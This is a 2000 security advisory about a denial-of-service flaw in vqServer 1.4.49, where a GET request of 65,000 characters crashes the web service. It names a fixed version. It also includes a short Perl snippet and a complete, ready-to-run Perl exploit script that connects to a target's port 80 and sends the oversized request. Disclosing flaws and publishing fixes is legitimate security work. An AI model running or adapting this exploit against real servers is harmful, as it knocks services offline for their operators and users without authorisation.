[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : D.o.S in vqServer

Title: D.o.S in vqServer
Released by: DHC
Date: 27th August 2000
Printable version: Click here 
DHC Advisory

Advisory for vqServer 1.4.49

vqServer is made by vqSoft. Site: http://www.vqsoft.com

by nemesystm of the DHC

(http://dhcorp.cjb.net - auto45040@hushmail.com)



/-|=[explaination]=|-\

When sending vqServer version 1.4.49 a malformed URL request it will crash

the service. This has been verified to work on the Windows version, but

it probably is in the linux/unix version and prior versions too.



/-|=[testing it]=|-\

To test this vulnerability, send a GET request with 65000 characters.

So:

GET /AAA (hit return =)

Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste

that much characters in their browser fields (www.server.com/AAA) you will

have to use something like Telnet.

You can easily program something to print 65000 chars in Perl:

open (OUT, ">$ARGV[0]");

print OUT ("GET /");

print OUT ("A" x 65000);

then it's just a cut and paste.

Or you can use the example code below



/-|=[fix]=|-\

the latest edition of vqServer (1.9.47) is unaffected by this. It is available

for download at www.vqsoft.com



/-|=[notes]=|-\

PUT, POST and the Administration port do not seem to be affected by a high

amount of characters. The Windows version needed a reinstall every five

or so crashes. A reboot or total shutdown did not help.



/-|=[exploit code]=|-\

sinfony quickly wrote some code so you can see if you're vulnerable.



#!/usr/bin/perl

# DoS exploit for vqServer 1.4.49

# This vulnerability was discovered by nemesystm

# (auto45040@hushmail.com)

#

# code by: sinfony    (chinesef00d@hotmail.com)

# [confess.sins.labs] (http://www.ro0t.nu/csl)

# and DHC member 

#

# kiddie quote of the year:

#  dude piffy stfu i bet you don't even know how to exploit it



die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n

usage: $0  \n"

if $#ARGV != 0;



use IO::Socket;



$host = $ARGV[0];

$port = 80;



print "Connecting to $host on port $port...\n";

$suck = IO::Socket::INET->

new(Proto=>"tcp",

PeerAddr=>$host,

PeerPort=>$port)

|| die "$host isnt a webserver you schmuck.\n";



$a = A;

$send = $a x 65000;

print "Connected, sending exploit.\n";

print $suck "GET /$send\n";

sleep(3);

print "Exploit sent. vqServer should be dead.\n";

close($suck)






(C) 1999-2000 All rights reserved.